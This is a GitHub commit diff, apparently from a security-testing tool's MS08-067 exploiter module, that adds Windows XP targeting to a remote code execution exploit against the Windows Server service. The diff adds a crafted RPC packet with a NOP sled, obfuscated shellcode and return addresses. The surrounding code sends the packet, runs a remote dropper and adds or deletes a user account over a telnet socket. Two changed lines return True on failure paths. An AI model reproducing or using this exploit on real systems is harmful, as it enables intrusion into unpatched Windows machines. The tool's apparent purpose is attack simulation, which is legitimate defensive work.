Merge pull request #809 from VakarisZ/ms08-067

Added windows XP support for win_ms08_067
This commit is contained in:
VakarisZ 2020-09-01 11:56:02 +03:00 committed by GitHub
commit 7107e963fb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 3 deletions

View File

@ -50,6 +50,23 @@ OBFUSCATED_SHELLCODE = ("\xa9\xb6\x4a\x39\x56\x60\xb5\xba\xf6\xb2\xc0\x19\xc1\x6
SHELLCODE = clarify(OBFUSCATED_SHELLCODE) SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
"\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
"\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
"\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
"\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
"\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
"\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00")
# Payload for Windows 2000 target # Payload for Windows 2000 target
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00' PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41' PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
@ -82,6 +99,7 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
class WindowsVersion(IntEnum): class WindowsVersion(IntEnum):
Windows2000 = 1 Windows2000 = 1
Windows2003_SP2 = 2 Windows2003_SP2 = 2
WindowsXP = 3
class SRVSVC_Exploit(object): class SRVSVC_Exploit(object):
@ -91,6 +109,7 @@ class SRVSVC_Exploit(object):
self._port = port self._port = port
self._target = target_addr self._target = target_addr
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003 self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
self.os_version = os_version
def get_telnet_port(self): def get_telnet_port(self):
"""get_telnet_port() """get_telnet_port()
@ -129,6 +148,8 @@ class SRVSVC_Exploit(object):
return sock return sock
def _build_dce_packet(self): def _build_dce_packet(self):
if self.os_version == WindowsVersion.WindowsXP:
return XP_PACKET
# Constructing Malicious Packet # Constructing Malicious Packet
dce_packet = '\x01\x00\x00\x00' dce_packet = '\x01\x00\x00\x00'
dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00' dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
@ -157,7 +178,8 @@ class Ms08_067_Exploiter(HostExploiter):
_TARGET_OS_TYPE = ['windows'] _TARGET_OS_TYPE = ['windows']
_EXPLOITED_SERVICE = 'Microsoft Server Service' _EXPLOITED_SERVICE = 'Microsoft Server Service'
_windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2, _windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2} 'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
'Windows 5.1': WindowsVersion.WindowsXP}
def __init__(self, host): def __init__(self, host):
super(Ms08_067_Exploiter, self).__init__(host) super(Ms08_067_Exploiter, self).__init__(host)
@ -231,7 +253,7 @@ class Ms08_067_Exploiter(HostExploiter):
break break
if not remote_full_path: if not remote_full_path:
return False return True
# execute the remote dropper in case the path isn't final # execute the remote dropper in case the path isn't final
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
@ -251,7 +273,7 @@ class Ms08_067_Exploiter(HostExploiter):
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode()) sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
except Exception as exc: except Exception as exc:
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc) LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
return False return True
finally: finally:
try: try:
sock.close() sock.close()